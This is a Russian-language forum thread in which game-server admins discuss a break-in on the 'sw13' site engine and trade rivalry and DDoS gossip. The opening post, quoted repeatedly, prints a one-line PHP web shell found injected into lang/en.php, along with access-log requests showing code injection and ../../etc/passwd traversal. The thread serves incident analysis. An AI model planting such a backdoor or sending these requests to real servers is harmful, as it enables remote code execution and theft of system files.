Перейти к содержанию
Авторизация  
S1Frost

Взлом sw13

Рекомендуемые сообщения

Собственно ломанули sw13,ломал всем известный GOVNO11000

был затронут только один файл sw13/lang/en.php (судя по датам изменение)

после беглого осмотра в нём в начале текста появилось следующие:

if(isset($_GET['Ww'])){
$_REQUEST['Ww']($_COOKIE['WwW']);}

лог веб сервера

error.log

index.php'if(isset($_GET['Ww'])){  $_REQUEST['Ww']($_COOKIE['WwW']);}  if (!defined("STRESSWEB"))  die("Access denied...");  $lang = array(
/application/.htaccess: Invalid command '\xef\xbb\xbfOrder', perhaps misspelled or defined by a module not included in the server configuration

access.log

"GET /index.php?f=en%27
"GET /index.php?f=en?if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /index.php'if(isset($_GET['Ww']))%7B%20%20$_REQUEST['Ww']($_COOKIE['WwW']);%7D%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php
"GET /application/en.php?session?if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php?session/../../if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php?session/../../etc/passwd
"GET /etc/passwd

Собственно есть у кого какие мысли как был точно осуществлён взлом,так как на протяжение нескольких лет многих кого взломали через этот самый en.php

 

но логи не кто так и не предоставлял в массы

Изменено пользователем S1Frost

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

чистый св от одного из клиентов + много раскодированных от кубика файлов

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

дурыку уже прикрыл,просто в массы как ломает гавно,обломать его бизнес

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Опять одно и тоже.Уже говорили что он не трогает говно проекты.

Так что это не он 100%.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Опять одно и тоже.Уже говорили что он не трогает говно проекты.

Так что это не он 100%.

именно он это был...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Если можешь, поставь св на котором был взломан, и ссылочку в лк. буду благодарен.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Может и мой сайт взломает или досс хочу посмотреть свою защиту на прочность ) 

кто сможет это сделать пишите в личку я скину ссылку на сайт :db:

тут писать не буду а то скажут что реклама.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Запросами GET можно только посмотреть или дернуть исполняемый файл. Вредоносный код судя по всему как то подругому залили.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Собственно ломанули sw13,ломал всем известный GOVNO11000

был затронут только один файл sw13/lang/en.php (судя по датам изменение)

после беглого осмотра в нём в начале текста появилось следующие:

if(isset($_GET['Ww'])){
$_REQUEST['Ww']($_COOKIE['WwW']);}

лог веб сервера

error.log

index.php'if(isset($_GET['Ww'])){  $_REQUEST['Ww']($_COOKIE['WwW']);}  if (!defined("STRESSWEB"))  die("Access denied...");  $lang = array(
/application/.htaccess: Invalid command '\xef\xbb\xbfOrder', perhaps misspelled or defined by a module not included in the server configuration

access.log

"GET /index.php?f=en%27
"GET /index.php?f=en?if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /index.php'if(isset($_GET['Ww']))%7B%20%20$_REQUEST['Ww']($_COOKIE['WwW']);%7D%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php
"GET /application/en.php?session?if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php?session/../../if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php?session/../../etc/passwd
"GET /etc/passwd

Собственно есть у кого какие мысли как был точно осуществлён взлом,так как на протяжение нескольких лет многих кого взломали через этот самый en.php

 

но логи не кто так и не предоставлял в массы

Желательно поставить данную платформы и посмотреть если есть такая возможность поставь  и ссылку дай будем смотреть  а там уже будем решать .

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Говно вроде только  от 1к онлайн приходит Иначе смысла нет ему!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

вы не правы, он щас ходит по всем серверам, скатился видимо )

Потому что мелкие сервера отбивают часть онлайна у крупных, а крупные сервера ему платят.

По этому он убивает мелкие сервера, кароче скоро л2 вымрет, если каждый второй серв на старте будет фейлится из за гавна

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

респект говну_) давно пора убивать одно дневние сервера))))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

респект говну_) давно пора убивать одно дневние сервера))))

Это говорит человек, который не покупает обширную рекламу ? За счет чего его гавно не видит, и соответственно не ддосит, так как ты никому не нужен

Ты же кричал что каждую неделю по серверу открываешь, это разве не однодневка ?

А гавно убивает нормальные проекты, которые могут дать хоть небольшую, но все же конкуренцию топовым проектам.

На твой сервер ему вообще похрен, тебя на том же упсе нет даже (согласен, это далеко не показатель но все же)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Это говорит человек, который не покупает обширную рекламу ? За счет чего его гавно не видит, и соответственно не ддосит, так как ты никому не нужен

Ты же кричал что каждую неделю по серверу открываешь, это разве не однодневка ?

А гавно убивает нормальные проекты, которые могут дать хоть небольшую, но все же конкуренцию топовым проектам.

На твой сервер ему вообще похрен, тебя на том же упсе нет даже (согласен, это далеко не показатель но все же)

Уважаемий я отличие от других купил себе обвязку у програмиста со своего города)))) откуда ти знаеш что я покупаю а что нет? у меня есть проекти как для неделбних стартов так и лоу рейти ... если я дето и дедлился инфой что и как я делаю ето незначит что я сливал все о себе)))) да и прежди чем делать такие виводи удостовертесь в том что действительно етот как все его називают некрасиво ломает токо вип проекти) своим постом я всего лиш хотел подчеркнуть что те люди которие достали сборку путем обмана либло откриваютса токо прочитав несколько мануалов на макси или на другом форуме и поставив сборку на свой пк обманивают играков и за сутки собрав донейт закривают проект! а люди вместо мало извесних проектов которие токо начинают свой путь идут на обширние проекти с покупними кланами де при сливе кланов после валакаса все топают на другой сервер ! люди должни играть и там де нет покупних кланов так как ето намного интересние! я вот свой посл проект попробовал открить в автомат режиме (без общение по форуму аське без клан бонусов и тд!) сервер на ура открился с 330 онолайна а  люди в игре думали какбудто 1к живого когда их спрашивали новички скоко онлайна! PS если ви попитаетесь меня дизморалить за щет моей граматики по рускому язику то ето напрасно! я давно уже негонюсь за репутацией на форуме и тд так как с моим знанием токо укр ито недосконально ето напрасно ) а зайти написать под пивчанский пост второй ето гуд! а щео на то что вы уважаемий вспомнили анонс в вашом сообщение на котором вас нету так тут все просто на упсе жизнь незаканчиваетса) ещо есть л2топ а также яндекс дирек) удачи вам и набудущие если захотите подизморалить когото то найдите соседа или брата или кореша и там дизморальте а мне как било всеравно на вас так и будет!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Собственно ломанули sw13,ломал всем известный GOVNO11000

был затронут только один файл sw13/lang/en.php (судя по датам изменение)

после беглого осмотра в нём в начале текста появилось следующие:

if(isset($_GET['Ww'])){
$_REQUEST['Ww']($_COOKIE['WwW']);}

лог веб сервера

error.log

index.php'if(isset($_GET['Ww'])){  $_REQUEST['Ww']($_COOKIE['WwW']);}  if (!defined("STRESSWEB"))  die("Access denied...");  $lang = array(
/application/.htaccess: Invalid command '\xef\xbb\xbfOrder', perhaps misspelled or defined by a module not included in the server configuration

access.log

"GET /index.php?f=en%27
"GET /index.php?f=en?if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /index.php'if(isset($_GET['Ww']))%7B%20%20$_REQUEST['Ww']($_COOKIE['WwW']);%7D%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php
"GET /application/en.php?session?if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php?session/../../if(isset($_GET[%27Ww%27])){%20%20$_REQUEST[%27Ww%27]($_COOKIE[%27WwW%27]);}%20%20if%20(!defined(%22STRESSWEB%22))%20%20die(%22Access%20denied...%22);%20%20$lang%20=%20array
"GET /application/en.php?session/../../etc/passwd
"GET /etc/passwd

Собственно есть у кого какие мысли как был точно осуществлён взлом,так как на протяжение нескольких лет многих кого взломали через этот самый en.php

 

но логи не кто так и не предоставлял в массы

 мной sw13 перебазированная   под выше php версии и правки капчи  и малой тюнингу

из выше перечисленных

щелей не сработало 

есть у кого еще список  способа взлома

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

 мной sw13 перебазированная   под выше php версии и правки капчи  и малой тюнингу

из выше перечисленных

щелей не сработало 

есть у кого еще список  способа взлома

Я хоть и несильно знаюсь на хакерах и взломах но посл рас общяясь с человеком которий сливал мне за деньги уязвимость моего проекта он наголосил что любой хакер внедряя свой вредоносний код оставляет фейковие слиди имхо его взлом бистро пофиксят и он будет никто и звать его некак ) скорее всего в вашем случяее гавно просто оставил фейковой след ... но и ето всеголиш предположение в моем посте!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Уважаемий я отличие от других купил себе обвязку у програмиста со своего города)))) откуда ти знаеш что я покупаю а что нет? у меня есть проекти как для неделбних стартов так и лоу рейти ... если я дето и дедлился инфой что и как я делаю ето незначит что я сливал все о себе)))) да и прежди чем делать такие виводи удостовертесь в том что действительно етот как все его називают некрасиво ломает токо вип проекти) своим постом я всего лиш хотел подчеркнуть что те люди которие достали сборку путем обмана либло откриваютса токо прочитав несколько мануалов на макси или на другом форуме и поставив сборку на свой пк обманивают играков и за сутки собрав донейт закривают проект! а люди вместо мало извесних проектов которие токо начинают свой путь идут на обширние проекти с покупними кланами де при сливе кланов после валакаса все топают на другой сервер ! люди должни играть и там де нет покупних кланов так как ето намного интересние! я вот свой посл проект попробовал открить в автомат режиме (без общение по форуму аське без клан бонусов и тд!) сервер на ура открился с 330 онолайна а  люди в игре думали какбудто 1к живого когда их спрашивали новички скоко онлайна! PS если ви попитаетесь меня дизморалить за щет моей граматики по рускому язику то ето напрасно! я давно уже негонюсь за репутацией на форуме и тд так как с моим знанием токо укр ито недосконально ето напрасно ) а зайти написать под пивчанский пост второй ето гуд! а щео на то что вы уважаемий вспомнили анонс в вашом сообщение на котором вас нету так тут все просто на упсе жизнь незаканчиваетса) ещо есть л2топ а также яндекс дирек) удачи вам и набудущие если захотите подизморалить когото то найдите соседа или брата или кореша и там дизморальте а мне как било всеравно на вас так и будет!

Извините, больше не буду с вами спорить, вы правы, вы лучший

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Хм неужели даже проекты 50-150 онлайн он стал валить?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Извините, больше не буду с вами спорить, вы правы, вы лучший

Вы мне лстите сударь)))Спасибо добра вам)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Хм неужели даже проекты 50-150 онлайн он стал валить?

не знаю как 150, но 300 онлайна валит бывает

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

и сколько требуют бабла???

300 это уже средний онлайн на тех же допах даже топы МЭД арес Мун ланд макс 500 собирают а то и все 350

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
Авторизация  

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×
×
  • Создать...